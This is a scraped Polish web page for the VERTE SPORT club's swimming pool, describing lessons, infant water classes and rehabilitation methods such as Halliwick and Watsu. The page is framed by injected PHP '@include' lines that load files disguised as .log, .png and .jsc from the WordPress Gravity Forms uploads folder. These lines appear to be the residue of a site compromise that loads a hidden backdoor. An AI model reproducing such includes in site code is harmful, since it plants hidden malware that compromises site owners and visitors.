@include "wp-content/uploads/gravity_forms/f/c/h/c/include/7179.log"; @include "wp-content/uploads/gravity_forms/a/b/a/g/include/7390.png"; @include "wp-content/uploads/gravity_forms/f/c/h/c/include/7179.log";
Basen | VERTE SPORT

Basen

Niewielki kameralny basen z zawsze ciepłą wodą. Idealne warunki do nauki pływania dla dorosłych i dzieci, zajęć rehabilitacyjnych, aqua aerobiku czy masażu wodnego. To także doskonałe uzupełnienie treningu siłowego, świetna alternatywa dla maszyn cardio – nie obciążając stawów buduje wytrzymałość, zwiększa pojemność płuc, wzmacnia mięśnie i spala tłuszcz. Efekty pływania to również obniżenie cholesterolu poprawa ciśnienia, funkcjonowania układu krążenia, układu nerwowego, a nawet funkcji poznawczych. Tak więc osoby pływające regularnie  mogą poszczycić się znacznie młodszym wiekiem biologicznym niż wskazywałaby na to ich metryka. Basen wręcz cofa czas…  i komu potrzebny jest jeszcze krem na zmarszczki?

Zajęcia grupowe dla dzieci od 4 miesięcy do 6 lat prowadzone przez doświadczonych trenerów odbywają sie w każdy weekend.

Głównym celem zajęć w wodzie dla niemowląt i dzieci jest adaptacja do środowiska wodnego, nauczenie dzieci swobodnego, podstawowego poruszania się w wodzie oraz wykorzystywanie wody do różnego rodzaju ćwiczeń w celu poprawy sprawności fizycznej. Dla niemowląt jest to przede wszystkim sposób na nawiązanie jeszcze większej więzi z rodzicem – ciało przy ciele, czas spędzony na zabawie i odkrywaniu własnego ciała a także jego możliwości. Dla rodziców jest to również wspaniały czas spędzony ze swoją pociechą i obserwacja wszelkich jego poczynań rozwojowych.

U niemowląt i małych dzieci występuje bardzo silna potrzeba bliskości z rodzicem, dlatego zajęcia są prowadzone z jego obecnością. Obecność rodzica, częste przytulanie, głaskanie, dotykanie, całowanie czy kontakt słowny jest dla dzieci bardzo ważny czują się bezpiecznie w nieznanym otoczeniu. Z czasem dziecko przyzwyczaja się do warunków jakie panują w środowisku wodnym oraz uczy się niezależności w wodzie. Zapoznaje się z siłą wyporu, zaczyna aktywnie i swobodnie się zachowywać, początkowo przy pomocy rodzica a później przyborów wypornościowych. Po jakimś czasie uczy się samodzielnie utrzymywać na wodzie oraz się w niej poruszać używając prostych form lokomocji pionowej i poziomej, zanurzać twarz i nurkować.

Rehabilitacja w wodzie i nauka pływania prowadzone są w formie indywidualnych zajęć dla dzieci i dorosłych. Trenerka stosuje uznane na całym świecie metody: Halliwick, Halliwick APT, Watsu, Bad Ragaz Ring Method, Psychomotoryka, Integracja sensoryczna, PNF w wodzie. Posiada ponad dwudziestoletnie doświadczenie w pracy w wodzie. Prowadzi także indywidualne ćwiczenia fizjoterapeutyczne na lądzie.

@include "wp-content/uploads/gravity_forms/h/e/h/f/include/0209.jsc";